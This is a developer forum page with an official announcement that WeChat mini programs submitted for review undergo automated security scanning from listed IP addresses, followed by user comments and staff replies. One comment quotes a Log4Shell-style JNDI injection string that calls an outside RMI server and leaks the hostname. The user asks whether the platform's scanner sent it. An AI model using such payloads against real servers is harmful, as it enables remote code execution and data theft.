收藏
评论

小程序安全检测上线公告官方

为进一步提升小程序的安全性和用户体验,目前平台将对提审的小程序进行安全检测,以便能及时帮助开发者发现小程序可能存在的安全漏洞。

一、背景介绍

小程序在开发过程中若存在安全漏洞的情况,如敏感数据篡改、拖库信息泄露、WEB攻击等,容易造成小程序的安全隐患,可能带来代码易被反编译、核心业务逻辑被破译、算法易被二次打包等风险。因此,平台将对提审的小程序进行安全检测,以协助开发者提升小程序服务的安全性,同时开发者也应加强自身小程序安全漏洞监测能力,保证可及时消除潜在的安全风险。

二、审核过程

安全检测过程中,平台会模拟真实业务场景,向提审小程序的后台发送服务请求,服务器会收到来自平台(显示为:Tencent Security Team,请求IP为106.55.202.118;113.96.223.69;125.39.132.125;43.139.209.119)的请求。该请求均以较低速率进行,正常情况下不会影响小程序的正常服务。若确实出现了影响小程序正常业务的特殊情况,如用户无法进行小程序的正常访问,开发者可基于自身业务情况,对相应请求加以限频,如有其他疑问,欢迎随时通过官方社区进行反馈。

三、审核结果

安全检测的结果是小程序审核的重要参考。若小程序在安全检测中被检测到存在安全漏洞,该小程序的审核将不予通过。开发者可根据扫描报告中的修改指引,对安全漏洞进行相应修复后,再重新进行提审。

其他常见问题

Q1:可以选择不进行安全检测吗,是否会影响小程序代码提审结果?

A1:安全检测是小程序审核的环节之一,所有提审的小程序均需进行,若检测中发现安全漏洞或小程序故意采取措施规避检测,该小程序的审核将不予通过。

Q2:若在小程序代码审核已结束或审核已撤销的情况下,可以停止安全检测吗?

A2:若在小程序代码审核已结束的情况下,平台将持续进行未完成的安全检测直至完成,如有需要,开发者可通过平台提供的相应链接(在【小程序管理后台 → 通知中心】查看站内信即可)自行中止安全检测;若在小程序审核已撤销的情况下,平台将自动中止未完成的安全检测。

附表:安全检测内容详情



588864浏览
最后一次编辑于  03-08
收藏

71 个评论

  • Lion
    Lion
    2023-01-06

    请问一下

    ('${jndi:rmi://11.187.178.158:1099/bypass592e1eabadcb8e786805bc766a4deaaa-/-${hostName}}')

    这串参数 是微信平台做安全检测的时候传的参数吗?

    2023-01-06
    赞同
    回复
  • 韦欢政
    韦欢政
    2022-11-19

    这个攻击测试频率太高了

    2022-11-19
    赞同
    回复
  • 徐徐徐🍊
    徐徐徐🍊
    2022-11-12

    我是说怎么回事,以为被谁攻击了


    2022-11-12
    赞同
    回复
  • Freddy
    Freddy
    2022-11-11

    我刚发的贴,删我贴之前起码通知下我吧,玩不起是吧。。。

    2022-11-11
    赞同
    回复 1
    • 社区运营专员-wetingtu
      社区运营专员-wetingtu
      2022-11-11
      你好,没有删除的哈,只是评论会根据时间顺序自动排序,可以往后找找
      2022-11-11
      回复
  • -
    -
    2022-11-03

    挺好、跟着ua就来了

    2022-11-03
    赞同
    回复
  • 海小码
    海小码
    2022-09-20

    安全检查中,对于提测版本应该标记审核中,不然开发者会觉得没有提审,重复提交的。

    2022-09-20
    赞同
    回复 3
    • 社区运营专员-wetingtu
      社区运营专员-wetingtu
      2022-09-21
      提交审核的开发版本在提交审核后,会显示在审核版本中的
      2022-09-21
      1
      回复
    • 苏尔准
      苏尔准
      2022-12-19回复社区运营专员-wetingtu
      提交审核后,一页面一闪而过,根本不知道有没有提交成功。没有显示在审核版本中
      2022-12-19
      回复
    • 苏尔准
      苏尔准
      2022-12-19回复苏尔准
      测试了,似乎是safari下有bug
      2022-12-19
      回复
  • while True
    while True
    2022-09-18

    使用的云函数怎么看有没有被检测啊?

    2022-09-18
    赞同
    回复 1
    • 社区运营专员-wetingtu
      社区运营专员-wetingtu
      2022-09-19
      你好,提审的小程序均需进行安全检测,若需确认某个请求是否为平台检测,可以通过平台同步的ip地址自行进行确认
      2022-09-19
      回复
  • 毕鲜生
    毕鲜生
    2022-09-11

    提示,代码审核进行安全测试,然后点了继续提交之后,就没有然后了,是这样的吗?怎么都应该给个提示框,提示已经提交审核了吧。。。

    2022-09-11
    赞同
    回复 1
    • 社区运营专员-wetingtu
      社区运营专员-wetingtu
      2022-09-13
      登录小程序管理后台或者小程序助手,都能够看到审核状态的哈
      2022-09-13
      回复
  • 卡西莫多。
    卡西莫多。
    2022-08-15

    101.91.62.170,9.4.131.68这两个地址是你们的地址吗

    2022-08-15
    赞同
    回复 1
  • 清欢
    清欢
    2022-08-11

    需要自己做安全检测吗

    2022-08-11
    赞同
    回复 1

正在加载...

登录 后发表内容